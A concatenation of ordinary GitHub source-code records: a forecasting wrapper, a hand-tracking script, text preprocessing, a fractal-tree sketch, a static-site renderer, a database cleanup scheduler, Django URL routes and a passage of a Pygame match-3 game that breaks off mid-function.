StatsForecastMSTL(season_length=[3,12]) # doctest: +SKIP\n >>> fitted_model = model.fit(y=y) # doctest: +SKIP\n >>> y_pred = fitted_model.predict(fh=[1,2,3]) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"ignores-exogeneous-X\": True,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n \"python_dependencies\": [\"statsforecast\"],\n }\n\n def __init__(\n self,\n season_length: Union[int, List[int]],\n trend_forecaster=None,\n stl_kwargs: Optional[Dict] = None,\n pred_int_kwargs: Optional[Dict] = None,\n ):\n super().__init__()\n\n from sklearn.base import clone\n\n self.trend_forecaster = trend_forecaster\n self.season_length = season_length\n if trend_forecaster:\n self._trend_forecaster = clone(trend_forecaster)\n else:\n self._trend_forecaster = StatsForecastAutoETS(model=\"ZZN\")\n self.stl_kwargs = stl_kwargs\n self.pred_int_kwargs = pred_int_kwargs\n\n # checks if trend_forecaster is already wrapped with\n # StatsForecastBackAdapter\n if not isinstance(self._trend_forecaster, StatsForecastBackAdapter):\n # if trend_forecaster is sktime forecaster\n if isinstance(self._trend_forecaster, BaseForecaster):\n self._trend_forecaster = StatsForecastBackAdapter(\n self._trend_forecaster\n )\n else:\n raise TypeError(\n \"The provided forecaster is not compatible with MSTL. Please ensure\"\n \" that the forecaster you pass into the model is a sktime \"\n \"forecaster.\"\n )\n\n # check if prediction interval kwargs are passed\n if self.pred_int_kwargs:\n from statsforecast.utils import ConformalIntervals\n\n self._trend_forecaster.prediction_intervals = ConformalIntervals(\n **self.pred_int_kwargs\n )\n\n def _get_statsforecast_class(self):\n from statsforecast.models import MSTL\n\n return MSTL\n\n def _get_statsforecast_params(self):\n return {\n \"season_length\": self.season_length,\n \"trend_forecaster\": self._trend_forecaster,\n }\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n There are currently no reserved values for forecasters.\n\n Returns\n -------\n params : dict or list of dict, default = {}\n Parameters to create testing instances of the class\n Each dict are parameters to construct an \"interesting\" test instance,\n i.e., `MyClass(**params)` or `MyClass(**params[i])` creates a valid\n test instance. `create_test_instance` uses the first (or only)\n dictionary in `params`\n \"\"\"\n del parameter_set # to avoid being detected as unused by ``vulture`` etc.\n\n try:\n _check_soft_dependencies(\"statsmodels\")\n from sktime.forecasting.theta import ThetaForecaster\n\n params = [\n {\n \"season_length\": [3, 12],\n \"trend_forecaster\": ThetaForecaster(),\n },\n {\n \"season_length\": 4,\n },\n {\n \"season_length\": 4,\n \"pred_int_kwargs\": {\n \"n_windows\": 2,\n },\n },\n ]\n except ModuleNotFoundError:\n from sktime.forecasting.naive import NaiveForecaster\n\n params = [\n {\n \"season_length\": [3, 12],\n \"trend_forecaster\": NaiveForecaster(),\n },\n {\n \"season_length\": 4,\n },\n ]\n\n return params\n","repo_name":"sktime/sktime","sub_path":"sktime/forecasting/statsforecast.py","file_name":"statsforecast.py","file_ext":"py","file_size_in_byte":26907,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"44629008412","text":"import os\nimport sys\nimport time\nimport cv2\nimport numpy as np\nimport mediapipe as mp\nimport handdetection\nimport pyrealsense2 as rs\nfrom scipy.linalg import lstsq\nimport matplotlib.pyplot as plt\n\npipeline = rs.pipeline()\nconfig = rs.config()\n\npipeline_wrapper = rs.pipeline_wrapper(pipeline)\npipeline_profile = config.resolve(pipeline_wrapper)\ndevice = pipeline_profile.get_device()\ndevice_product_line = str(device.get_info(rs.camera_info.product_line))\n\nfound_rgb = False\nfor s in device.sensors:\n\tif s.get_info(rs.camera_info.name) == 'RGB Camera':\n\t\tfound_rgb = True\n\t\tbreak\nif not found_rgb:\n\tprint(\"The demo requires Depth camera with Color sensor\")\n\texit(0)\n\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\nif device_product_line == 'L500':\n\tconfig.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\nelse:\n\tconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\nprofile = pipeline.start(config)\n\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\nprint(\"Depth Scale is: \" , depth_scale)\n\nalign_to = rs.stream.color\nalign = rs.align(align_to)\n\nhanddetection.init()\n\n# FPS calculation initialization\nstart_time = time.time()\nfps_calc_window = 1\nnum_frames = 0\nfps = 0\nbase_frame = False\nbase_axis1, base_axis2, base_axis3 = None, None, None\nfrom graph import *\n\ntry:\n\twhile True:\n\t\tx_coords = np.array([])\n\t\ty_coords = np.array([])\n\t\tz_coords = np.array([])\n\t\tif not base_frame:\n\t\t\tprint(\"\\n\\n\\n *************** Smart Jedi X-Wing Starfighter *************** \\n\\nPlease place your hand in the frame to initialize the base frame\\n\\n\")\n\t\t\t#cv2.waitKey(10)\n\t\t\ttime.sleep(3)\n\t\t\tbase_frame=True\n\t\tframes = pipeline.wait_for_frames()\n\t\taligned_frames = align.process(frames)\n\n\t\taligned_depth_frame = aligned_frames.get_depth_frame()\n\t\tcolor_frame = aligned_frames.get_color_frame()\n\n\t\t# Validate that both frames are valid\n\t\tif not aligned_depth_frame or not color_frame:\n\t\t\tcontinue\n\n\t\tdepth_image = np.asanyarray(aligned_depth_frame.get_data())\n\t\tcolor_image = np.asanyarray(color_frame.get_data())\n\t\timage_height, image_width, _ = color_image.shape\n\n\t\tprocessed_img, hand_landmarks, gesture = handdetection.process(color_image)\n\t\tif hand_landmarks:\n\t\t\tlandmarks = hand_landmarks.landmark\n\n\t\t\tfor i in range(21): # keypoint in mp.solutions.hands.HandLandmark\n\t\t\t\tpixel_x, pixel_y = landmarks[i].x * image_width, landmarks[i].y * image_height\n\t\t\t\trounded_x, rounded_y = round(pixel_x), round(pixel_y)\n\t\t\t\tdepth = 0\n\t\t\t\tif rounded_x >= 0 and rounded_x < 480 and rounded_y >= 0 and rounded_y < 480:\n\t\t\t\t\tdepth = depth_image[rounded_y][rounded_x]\n\t\t\t\t#z_coords = np.append(z_coords, depth)\n\t\t\t\tprint(f\"{mp.solutions.hands.HandLandmark(i)}: (X: {pixel_x}, Y: {pixel_y}, Depth: {depth})\")\n\t\t\tprint(\"\\n\\n\")\n\n\t\t\t#z_coords[z_coords == 0] = np.mean(z_coords)\n\t\t\t#z_coords = z_coords\n\n\t\t\tx_coords = np.append(x_coords, np.array([hand_landmarks.landmark[i].x for i in range(21)]))\n\t\t\ty_coords = np.append(y_coords, np.array([hand_landmarks.landmark[i].y for i in range(21)]))\n\t\t\tz_coords = np.append(z_coords, np.array([hand_landmarks.landmark[i].z for i in range(21)]))\n\n\t\t\t# set up linear system\n\t\t\tones = np.repeat(1, len(x_coords))\n\t\t\tA = np.concatenate((x_coords[:,np.newaxis], y_coords[:,np.newaxis], ones[:,np.newaxis]),axis=1)\n\t\t\tb = z_coords\n\t\t\tplane_coeffs, residual, rnk, s = lstsq(A, b)\n\n\t\t\tfig = plt.figure()\n\t\t\tax = fig.add_subplot(111, projection='3d')\n\t\t\tax.scatter(x_coords, y_coords, z_coords, color='g')\n\n\t\t\tX,Y = np.meshgrid(x_coords, y_coords)\n\t\t\tZ = plane_coeffs[0] * X + plane_coeffs[1] * Y + plane_coeffs[2]\n\n\t\t\tbest_fit_plane = np.array([X.flatten(), Y.flatten(), Z.flatten()])\n\t\t\tcentroid = np.mean(best_fit_plane, axis=1, keepdims=True)\n\t\t\tsvd = np.linalg.svd(best_fit_plane - centroid)\n\t\t\tif base_axis1 is None:\n\t\t\t\tbase_axis1 = svd[0][:, -1]\n\t\t\tnormal_vector = svd[0][:, -1] #left singular vector\n\t\t\t#normal_fn = lambda X,Y,Z: np.cross(np.array([X[1]-X[0], Y[1]-Y[0], Z[1]-Z[0]]), np.array([X[2]-X[0], Y[2]-Y[0], Z[2]-Z[0]]))\n\n\t\t\torigin = centroid.flatten()\n\t\t\tax.quiver(origin[0], origin[1], origin[2], normal_vector[0], normal_vector[1], normal_vector[2])\n\t\t\tif base_axis2 is None:\n\t\t\t\tbase_axis2 = np.array([hand_landmarks.landmark[12].x, hand_landmarks.landmark[12].y, hand_landmarks.landmark[12].z])\n\t\t\taxes2 = np.array([hand_landmarks.landmark[12].x, hand_landmarks.landmark[12].y, hand_landmarks.landmark[12].z])\n\t\t\tax.quiver(origin[0], origin[1], origin[2], axes2[0], axes2[1], axes2[2])\n\t\t\tcross_prod_fn = lambda vec1,vec2: np.cross(vec1, vec2)\n\t\t\tif base_axis3 is None:\n\t\t\t\tbase_axis3 = cross_prod_fn(normal_vector, axes2)\n\t\t\taxes3 = cross_prod_fn(normal_vector, axes2)\n\n\t\t\tos.system('clear')\n\n\t\t\tangle_1 = np.arccos(np.dot(base_axis1-origin, normal_vector-origin) / (np.linalg.norm(base_axis1-origin) * np.linalg.norm(normal_vector-origin)))\n\t\t\tprint(\"\\n Angle 1:\", angle_1)\n\t\t\tangle_2 = np.arccos(np.dot(base_axis2-origin, axes2-origin) / (np.linalg.norm(base_axis2-origin) * np.linalg.norm(axes2-origin)))\n\t\t\tprint(\"\\n Angle 2:\", angle_2)\n\t\t\tangle_3 = np.arccos(np.dot(base_axis3-origin, axes3-origin) / (np.linalg.norm(base_axis3-origin) * np.linalg.norm(axes3-origin)))\n\t\t\tprint(\"\\n Angle 3:\", angle_3)\n\n\t\t\tax.quiver(origin[0], origin[1], origin[2], axes3[0], axes3[1], axes3[2])\n\t\t\tax.plot_surface(X, Y, Z)\n\t\t\tax.plot(x_coords, y_coords, z_coords)\n\t\t\tset_axes_equal(ax)\n\t\t\t#plt.show()\n\n\t\tif gesture:\n\t\t\tprint(gesture)\n\t\t \n\t\tnum_frames += 1\n\t\tif (time.time() - start_time) > fps_calc_window:\n\t\t\tfps = num_frames / fps_calc_window\n\t\t\tnum_frames = 0\n\t\t\tstart_time = time.time() \n\n\t\tprint(f\"FPS: {fps}\")\n\n\t\t# Flip the image horizontally for a selfie-view display.\n\t\tflipped = cv2.flip(processed_img, 1)\n\t\tcv2.imshow('MediaPipe Hands', flipped)\n\t\tif cv2.waitKey(5) & 0xFF == 27:\n\t\t\tbreak\n\nfinally:\n\tpipeline.stop()\n\n","repo_name":"KhanWhale/proj106a","sub_path":"old-code/vision/realsense.py","file_name":"realsense.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13105832018","text":"import re\nimport string\n\nmisspell_dict = {\"aren't\": \"are not\", \"can't\": \"cannot\", \"couldn't\": \"could not\",\n \"didn't\": \"did not\", \"doesn't\": \"does not\", \"don't\": \"do not\",\n \"hadn't\": \"had not\", \"hasn't\": \"has not\", \"haven't\": \"have not\",\n \"he'd\": \"he would\", \"he'll\": \"he will\", \"he's\": \"he is\",\n \"i'd\": \"I had\", \"i'll\": \"I will\", \"i'm\": \"I am\", \"isn't\": \"is not\",\n \"it's\": \"it is\", \"it'll\": \"it will\", \"i've\": \"I have\", \"let's\": \"let us\",\n \"mightn't\": \"might not\", \"mustn't\": \"must not\", \"shan't\": \"shall not\",\n \"she'd\": \"she would\", \"she'll\": \"she will\", \"she's\": \"she is\",\n \"shouldn't\": \"should not\", \"that's\": \"that is\", \"there's\": \"there is\",\n \"they'd\": \"they would\", \"they'll\": \"they will\", \"they're\": \"they are\",\n \"they've\": \"they have\", \"we'd\": \"we would\", \"we're\": \"we are\",\n \"weren't\": \"were not\", \"we've\": \"we have\", \"what'll\": \"what will\",\n \"what're\": \"what are\", \"what's\": \"what is\", \"what've\": \"what have\",\n \"where's\": \"where is\", \"who'd\": \"who would\", \"who'll\": \"who will\",\n \"who're\": \"who are\", \"who's\": \"who is\", \"who've\": \"who have\",\n \"won't\": \"will not\", \"wouldn't\": \"would not\", \"you'd\": \"you would\",\n \"you'll\": \"you will\", \"you're\": \"you are\", \"you've\": \"you have\",\n \"'re\": \" are\", \"wasn't\": \"was not\", \"we'll\": \" will\", \"tryin'\": \"trying\"}\n\npuncts = [',', '.', '\"', ':', ')', '(', '-', '!', '?', '|', ';', \"'\", '$', '&', '/', '[', ']',\n '>', '%', '=', '#', '*', '+', '\\\\', '•', '~', '@', '£', '·', '_', '{', '}', '©', '^',\n '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█',\n '½', 'à', '…', '“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶',\n '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─', '▒', ':', '¼',\n '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲',\n 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞', '∙', ')', '↓', '、', '│', '(', '»', ',', '♪',\n '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√']\n\n\ndef _get_misspell(misspell_dict):\n misspell_re = re.compile('(%s)' % '|'.join(misspell_dict.keys()))\n return misspell_dict, misspell_re\n\n\ndef replace_typical_misspell(text):\n misspellings, misspellings_re = _get_misspell(misspell_dict)\n\n def replace(match):\n return misspellings[match.group(0)]\n\n return misspellings_re.sub(replace, text)\n\n\ndef clean_text(x):\n x = str(x)\n for punct in puncts + list(string.punctuation):\n if punct in x:\n x = x.replace(punct, f' {punct} ')\n return x\n\n\ndef clean_numbers(x):\n return re.sub(r'\\d+', ' ', x)\n\n\ndef preprocess(text):\n text = str(text).lower()\n text = replace_typical_misspell(text)\n text = clean_text(text)\n text = clean_numbers(text)\n text = text.strip()\n return text\n","repo_name":"sakami0000/kaggle_jigsaw","sub_path":"src/lstm_models/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"40211848263","text":"#Aaron Cheng\n#Controls:\n # l: turn on and off leaves\n # n: turn on an off numbering\n # a: tilt the branches left\n # d: tilt the branches right\n # w: increase the branches', numbers', and leaves' sizes\n # d: decrease the branches', numbers', and leaves' sizes\n # click: toggle animation for the tree to sway \"naturally\"\n # z: increase number of branches\n # x: decrease number of branches\n # c: change leaf and number colors to a random color\nimport sys\nimport random\nimport math\n\n\ndef setup():\n size(1100, 800)\n background(255)\n pixelDensity(displayDensity())\n\ndef drawLineAngle(color, start, angle, length, width=1):\n angle += 180 # make up zero degrees\n end = (start[0] + math.sin(math.radians(angle)) * length,\n start[1] + math.cos(math.radians(angle)) * length)\n stroke(*color)\n if width:\n strokeWeight(width)\n else:\n noStroke()\n line(*(start + end))\n return end\n\ndef drawLeaf(location):\n global treeWidth, leafColor\n stroke(0, 50, 0)\n fill(*leafColor)\n strokeWeight(0.5)\n ellipse(location[0],location[1],5+treeWidth/5,5+treeWidth/5)\n \ndef drawNumber(location):\n global number, treeWidth, leafColor\n stroke(0, 50, 0)\n fill(*leafColorc)\n strokeWeight(0.5)\n ellipse(location[0],location[1],18+treeWidth/5,18+treeWidth/5)\n textSize(13+treeWidth/5)\n textAlign(CENTER)\n fill(0,0,0)\n text(number,location[0],location[1]+5+treeWidth/10)\n number+=1\n \n\ndef drawTree(start,leaf,showNumber,angle,count,length,width):\n global tilt, depth\n end = drawLineAngle((0,0,0),start,angle,length,width)\n \n if count < depth:\n drawTree(end,leaf,showNumber,angle+(30-count/2)+tilt,count+1,length/1.2,width/1.4)\n drawTree(end,leaf,showNumber,angle-(30-count/2)+tilt,count+1,length/1.2,width/1.4)\n elif leaf:\n drawLeaf(end)\n if showNumber: \n drawNumber(end)\n\ndef mouseClicked():\n global animate, tilt\n animate = not animate\n if not animate:\n tilt = 0\ndef keyPressed():\n global leaf, showNumber, tilt, treeWidth, animate, depth, leafColor\n if key==\"l\":\n leaf = not leaf\n if key==\"n\":\n showNumber = not showNumber\n if key==\"a\" and not animate:\n tilt += 10\n if key==\"d\" and not animate:\n tilt -= 10\n if key==\"w\":\n treeWidth += 10\n if key==\"s\":\n treeWidth -= 10\n if key==\"z\":\n if depth < 20:\n depth += 1\n if key==\"x\":\n if depth > 1:\n depth -= 1\n if key==\"c\":\n leafColor = [random.random()*255 for i in range(3)]\n\ndef setup():\n global leaf, showNumber, treeWidth, tilt, animate, depth, leafColor\n leaf, showNumber, animate = True, True, False\n tilt, treeWidth, counter, depth = 0, 0, 0, 5\n leafColor = [100,255,100]\n\ndef draw():\n global number, treeWidth, tilt, counter\n number=0\n #animation = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,\n # -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]\n animation = [0.25] * 16 + [-0.25] * 32 + [0.25] * 16\n clear()\n background(255)\n if treeWidth <= 0:\n treeWidth=0\n if animate:\n tilt += animation[counter%64]\n counter += 1\n else:\n counter = 0\n drawTree((550,800),leaf,showNumber,0,0,150,20+treeWidth)","repo_name":"acheng6845/DataStructuresLab","sub_path":"tree.pyde","file_name":"tree.pyde","file_ext":"pyde","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14180427745","text":"import argparse\nimport json\nimport math\nimport os\nfrom http.server import HTTPServer, SimpleHTTPRequestHandler\n\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom livereload import Server\nfrom more_itertools import chunked\n\n\nCOUNT_BOOKS_ON_PAGE = 10\n\ndef on_reload():\n parser = argparse.ArgumentParser()\n parser.add_argument('--json_path', help='Путь к json', nargs='?', default='books.json')\n args = parser.parse_args()\n \n env = Environment(\n loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\n template = env.get_template('template.html')\n \n with open(args.json_path, 'r') as my_file:\n books_json = my_file.read()\n \n books_descriptions = json.loads(books_json)\n \n os.makedirs('pages', exist_ok=True)\n \n count_pages = math.ceil(len(books_descriptions)/COUNT_BOOKS_ON_PAGE)\n for page, books_on_page in enumerate(chunked(books_descriptions, COUNT_BOOKS_ON_PAGE), 1):\n rendered_page = template.render(books=books_on_page, count_pages=count_pages, current_page=page)\n with open(f'pages/index{page}.html', 'w', encoding='utf8') as file:\n file.write(rendered_page)\n\ndef main():\n on_reload()\n server = Server()\n server.watch('template.html', on_reload)\n server.serve(root='.', default_filename='./pages/index1.html')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"semellot/books-library-restyle","sub_path":"render_website.py","file_name":"render_website.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40121819434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 20:35:20 2019\n\n@author: Admin\n\"\"\"\n\nimport schedule\nimport time\nfrom datetime import datetime, timedelta\nfrom db_utils import DB\nimport json\nimport traceback\n\ndb_config = {\n 'host': 'queue_db',\n 'port': 3306,\n 'user': 'root',\n 'password': ''\n}\n\nqueue_db = DB('queues', **db_config)\nextraction_db = DB('extraction', **db_config)\nalorica_db = DB('alorica_data', **db_config)\n\ndef delete_data():\n query = \"SELECT * from process_queue where queue = 'Completed'\"\n case_ids = list(queue_db.execute(query).case_id)\n \n create_tuple = ''\n for i, case_id in enumerate(case_ids):\n if i == 0:\n create_tuple += f'(\"{case_id}\",'\n elif i == len(case_ids) - 1:\n create_tuple += f'\"{case_id}\")'\n else:\n create_tuple += f'\"{case_id}\",'\n \n delete_query = f\"DELETE FROM `process_queue` WHERE case_id in {create_tuple}\"\n queue_db.execute(delete_query)\n \n delete_query = f\"DELETE FROM `merged_blob` WHERE case_id in {create_tuple}\"\n queue_db.execute(delete_query)\n\n delete_query = f\"DELETE FROM `screen_shots` WHERE Fax_unique_id in {create_tuple}\"\n alorica_db.execute(delete_query)\n \n delete_query = f\"DELETE FROM `ocr` WHERE case_id in {create_tuple}\"\n extraction_db.execute(delete_query)\n \n return \"Done\"\n \n \n \ndef move_to_manual():\n query = \"SELECT * from process_queue where queue not in ('Enhance Decision', 'Express Cases', 'Completed', 'Template Exceptions')\"\n case_ids = list(queue_db.execute(query).case_id)\n \n for case_id in case_ids:\n try:\n query = f\"SELECT id, communication_date_time from process_queue where case_id = '{case_id}'\"\n communication_date = list(extraction_db.execute(query).communication_date_time)[0]\n \n communication_date = datetime.strptime(communication_date, '%d-%m-%Y %H:%M:%S')\n get_current_time = datetime.now() \n\n time_difference = (get_current_time - communication_date).total_seconds()/3600\n\n if time_difference > 2:\n query = f\"Update process_queue set queue = 'Express Cases', case_lock = 0, state = 'Bot failed', failure_status = 2, 'error_logs' = 'remaining TAT is less than 2 hours' where case_id = '{case_id}'\"\n queue_db.execute(query)\n except:\n traceback.print_exc()\n pass\n \n return \"Done\"\n \nschedule.every(15).minutes.do(move_to_manual)\nschedule.every().day.at(\"23:30\").do(delete_data)\n\n\nif __name__ == '__main__':\n while True:\n schedule.run_pending()\n time.sleep(10)","repo_name":"gopiteja/digi","sub_path":"scheduler/BL/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70144683046","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nfrom .swagger import swaggerurlpatterns\n\n\ndef trigger_error(request):\n division_by_zero = 1 / 0 # noqa\n\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/users/\", include(\"apps.users.urls\")),\n path(\"api/common/\", include(\"apps.common.urls\")),\n path(\"api/driver/\", include(\"apps.driver.urls\")),\n path(\"api/order/\", include(\"apps.order.urls\")),\n path(\"api/payment/\", include(\"apps.payment.urls\")),\n path(\"api/v1/sentry/TriggerError/\", trigger_error),\n path(\"__debug__/\", include(\"debug_toolbar.urls\")),\n]\n\nurlpatterns += swaggerurlpatterns\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"khodjiyev2o/tranzit.uz","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22673217654","text":"import json\nimport jsonschema\nimport math\nimport os\nimport pygame\nimport pygame_widgets as pygamew\nfrom sys import exit\nfrom pygame import gfxdraw\nfrom enum import Enum, auto\nfrom match3_board import Match3Board\n\n\nclass GameState(Enum):\n MAINMENU = auto()\n CHOOSESIZE = auto()\n RUNNING = auto()\n PAUSED = auto()\n ENDED = auto()\n ENTERHIGHSCORE = auto()\n HIGHSCORES = auto()\n PREFERENCES = auto()\n ABOUT = auto()\n\n\nclass MouseState(Enum):\n WAITING = auto()\n PRESSED = auto()\n MOVING = auto()\n\n\nclass Match3GUI:\n colors = (\n ( 0, 0,128), # 000080 Dark Blue\n (128, 0, 0), # 800000 Dark Red\n ( 0,128, 0), # 008000 Green\n (255,255, 0), # FFFF00 Yellow\n (255,255,255), # FFFFFF White\n ( 0, 0, 0), # 000000 Black\n ( 84, 84, 84), # 545454 Grey\n (192, 0,192), # C000C0 Purple-Magenta\n (172,172,255), # ACACFF Light Blue\n (255, 64, 64), # FF4040 Light Red\n (192,255,128), # C0FF80 Pale Green-Yellow\n ( 48,192,192), # 30C0C0 Greyed Cyan\n )\n border_color = (48, 48, 48)\n background_color = {\n \"screen\": (0, 0, 0),\n \"game\": (24, 24, 24),\n \"board\": (0, 0, 0),\n \"sidebar\": (48, 48, 48),\n }\n hint_color = (255, 255, 255)\n widget_text_color = (255, 255, 255)\n starting_width = 640\n starting_height = 480\n game_ratio = starting_width / starting_height\n board_scale = 9 / 10\n circle_scale = 18 / 20\n plus_score_ani_time = 500\n hint_ani_time = 500\n swap_ani_time = 200\n shift_down_ani_time = 200\n clear_ani_time = 200\n plus_score_blink_ani_time = 100\n ani_fps = 60\n main_loop_refresh_rate = 30\n flags = pygame.RESIZABLE | pygame.HWSURFACE | pygame.NOFRAME\n min_font_size = 20\n min_char_width = 13.8\n min_char_height = 13.8\n min_char_sep_height = min_char_height / 2\n time_init = 60000\n board_sizes = list(range(5, 14))\n high_score_name_max_len = 20\n high_scores_filename = \"high_scores.json\"\n high_scores_schema = '''\n {\n \"type\": \"object\",\n \"additionalProperties\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"array\",\n \"items\": [\n {\"type\": \"string\", \"maxLength\": 20},\n {\"type\": \"integer\", \"minimum\": 1}\n ],\n \"additionalProperties\": false\n },\n \"maxItems\": 5\n },\n \"propertyNames\": {\"enum\": []}\n }\n '''\n high_scores_schema = json.loads(high_scores_schema)\n high_scores_schema[\"propertyNames\"][\"enum\"] = [f\"{n}x{n}\" for n in board_sizes]\n preferences_filename = \"preferences.json\"\n preferences_schema = '''\n {\n \"type\": \"object\",\n \"properties\": {\n \"background_music\": {\n \"type\": \"boolean\"\n },\n \"sound_effects\": {\n \"type\": \"boolean\"\n }\n },\n \"additionalProperties\": false\n }\n '''\n preferences_schema = json.loads(preferences_schema)\n media_dir = \"media\"\n audio_dir = f\"{media_dir}/audio\"\n sounds_dir = f\"{audio_dir}/sounds\"\n music_dir = f\"{audio_dir}/music\"\n background_music_filename = f\"{music_dir}/background_music.ogg\"\n\n def __init__(self) -> None:\n self.board = None\n self.screen_surf = None\n self.game_surf = None\n self.board_surf = None\n self.sidebar_surf = None\n self.clock = None\n self.circle_radius = 0\n self.mouse_state = MouseState.WAITING\n self.board_pos_src = None\n self.score = 0\n self.time_left = self.time_init\n self.time_start = 0\n self.time_score = 0\n self.time_left_sec = int(self.time_left / 1000)\n self.active_widgets = {}\n self.hint = False\n self.hint_cut_score = False\n self.plus_score_ani_time_start = 0\n self.curr_plus_score_ani_time = self.plus_score_ani_time + 1\n self.curr_score = 0\n self.curr_time_score = 0\n self.game_state = GameState.MAINMENU\n self.font_size = self.min_font_size\n self.char_width = self.min_char_width\n self.char_height = self.min_char_height\n self.char_sep_height = self.min_char_sep_height\n self.font = None\n self.pause = False\n self.pause_time = 0\n self.time_paused = 0\n self.game_ended = False\n self.prev_state = None\n self.high_scores_state = 5\n self.high_scores = {}\n self.preferences = {}\n self.sounds = {}\n self.last_beep_sound_time = 0\n\n ##################################################\n # Animate functions\n ##################################################\n\n def animate_swap(self, board_point1: tuple[int, int], board_point2: tuple[int, int]) -> None:\n self.play_sound(\"swap\")\n\n board_points = (board_point1, board_point2)\n win_points = (list(self.board_pos_to_win_pos(*board_points[0])), list(self.board_pos_to_win_pos(*board_points[1])))\n\n target_dist = (\n [win_points[1][0] - win_points[0][0], win_points[1][1] - win_points[0][1]], # [dst_p1_x - src_p1_x, dst_p1_y - src_p1_y]\n [win_points[0][0] - win_points[1][0], win_points[0][1] - win_points[1][1]], # [dst_p2_x - src_p2_x, dst_p2_y - src_p2_y]\n )\n curr_pos = [list(win_points[0]), list(win_points[1])]\n\n curr_ani_time = 0\n ani_time_start = pygame.time.get_ticks()\n\n while curr_pos[0] != win_points[1] or curr_pos[1] != win_points[0]: # curr_p1 != dst_p1 or curr_p2 != dst_p2\n if self.process_events():\n self.screen_surf.fill(self.background_color[\"screen\"])\n self.game_surf.fill(self.background_color[\"game\"])\n self.draw_sidebar()\n win_points = (list(self.board_pos_to_win_pos(*board_points[0])), list(self.board_pos_to_win_pos(*board_points[1])))\n target_dist = (\n [win_points[1][0] - win_points[0][0], win_points[1][1] - win_points[0][1]], # [dst_p1_x - src_p1_x, dst_p1_y - src_p1_y]\n [win_points[0][0] - win_points[1][0], win_points[0][1] - win_points[1][1]], # [dst_p2_x - src_p2_x, dst_p2_y - src_p2_y]\n )\n\n self.draw_board(no_draw_pts=board_points)\n\n curr_ani_time = pygame.time.get_ticks() - ani_time_start\n\n for p_i in reversed(range(2)):\n # Calculate the new position\n src_pos = win_points[p_i]\n dst_pos = win_points[int(not p_i)]\n curr_dist = (target_dist[p_i][0] * curr_ani_time / self.swap_ani_time, target_dist[p_i][1] * curr_ani_time / self.swap_ani_time)\n curr_pos[p_i] = [src_pos[0] + curr_dist[0], src_pos[1] + curr_dist[1]]\n curr_pos[p_i] = [int(curr_pos[p_i][0]), int(curr_pos[p_i][1])]\n for i in range(2):\n dir = dst_pos[i] - src_pos[i]\n if (dir < 0 and curr_pos[p_i][i] < dst_pos[i]) or (dir > 0 and curr_pos[p_i][i] > dst_pos[i]):\n curr_pos[p_i][i] = dst_pos[i]\n # Draw the moving circles\n color_index = self.board.board[board_points[p_i][1]][board_points[p_i][0]]\n if color_index < 0:\n continue\n self.draw_circle(curr_pos[p_i][0], curr_pos[p_i][1], self.colors[color_index])\n\n pygame.display.flip()\n\n def animate_clear(self, board_points: list[tuple[int, int]], no_more_moves: bool = False) -> None:\n self.play_sound(\"match\")\n\n win_points = [self.board_pos_to_win_pos(*p) for p in board_points]\n\n target_transparency = 0\n target_size = 0\n curr_transparency = 255\n curr_size = self.circle_radius\n\n curr_ani_time = 0\n ani_time_start = pygame.time.get_ticks()\n\n clear_ani_time = self.clear_ani_time\n if no_more_moves:\n clear_ani_time *= 5\n\n while curr_transparency != target_transparency or curr_size != target_size:\n if self.process_events():\n 